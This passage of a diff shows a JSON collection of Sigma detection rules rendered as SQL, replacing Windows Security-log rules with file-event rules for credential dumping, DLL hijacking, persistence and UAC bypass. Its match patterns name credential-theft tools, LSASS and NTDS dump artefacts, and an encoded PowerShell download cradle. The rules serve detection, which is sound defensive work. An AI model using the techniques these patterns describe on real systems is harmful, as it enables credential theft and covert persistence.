(Nextron Systems), fornotes", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1098" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate extension of domain structure" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" + "SELECT * FROM logs WHERE (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_add_domain_trust.yml" + "filename": "file_event_win_create_non_existent_dlls.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", + "status": "experimental", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Tap Driver Installation - Security", - "id": "9c8afa4d-0022-48f0-9456-3712466f9701", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", + "id": "15904280-565c-4b73-9303-3291f964e7f9", + "status": "experimental", + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.persistence" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\'" ], - "filename": "win_security_tap_driver_installation.yml" + "filename": "file_event_win_persistence_error_handler_cmd.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "VsCode Powershell Profile Modification", + "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "cve.2021.42278", - "cve.2021.42287", "attack.persistence", "attack.privilege_escalation", - "attack.t1078" + "attack.t1546.013" ], "falsepositives": [ - "Unknown" + "Legitimate use of the profile by developers or administrators" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\'" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_susp_vscode_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "status": "test", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", - "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", + "status": "experimental", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation" + "attack.execution", + "cve.2021.44077" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" - ], + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Programs that connect locally to the RDP port" + "Administrative activity", + "PowerShell scripts running as SYSTEM user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_susp_system_interactive_powershell.yml" }, { - "title": "Processes Accessing the Microphone and Webcam", - "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", - "status": "test", - "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "status": "experimental", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "attack.collection", - "attack.t1123" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_camera_microphone_access.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", - "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "status": "test", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.persistence", - "attack.t1053.005" + "attack.execution", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "Suspicious PROCEXP152.sys File Created In TMP", + "id": "3da70954-0f2c-4103-adff-b7440368f50e", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "SCCM" + "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" }, { - "title": "Transferring Files with Credential Data via Network Shares", - "id": "910ab938-668b-401b-b08c-b596e80fdca5", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", + "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "status": "test", - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" + "filename": "file_event_win_winrm_awl_bypass.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Advanced IP Scanner - File Event", + "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "status": "test", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "@ROxPinTeddy", + "tags": [ + "attack.discovery", + "attack.t1046" + ], "falsepositives": [ - "Unknown" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\'" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_advanced_ip_scanner.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", - "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", - "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Unattend.xml File Access", + "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "status": "test", + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" + "filename": "file_event_win_access_susp_unattend_xml.yml" }, { - "title": "AD User Enumeration", - "id": "ab6bffca-beff-4baa-af11-6733f296d57a", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", "status": "test", - "description": "Detects access to a domain user from a non-machine account", - "author": "Maxime Thiebaut (@0xThiebaut)", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Administrators configuring new users." + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + ], + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + }, + { + "title": "Created Files by Microsoft Sync Center", + "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", + "status": "experimental", + "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", + "author": "elhoim", + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ], + "falsepositives": [ + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_security_ad_user_enumeration.yml" + "filename": "file_event_win_susp_creation_by_mobsync.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName 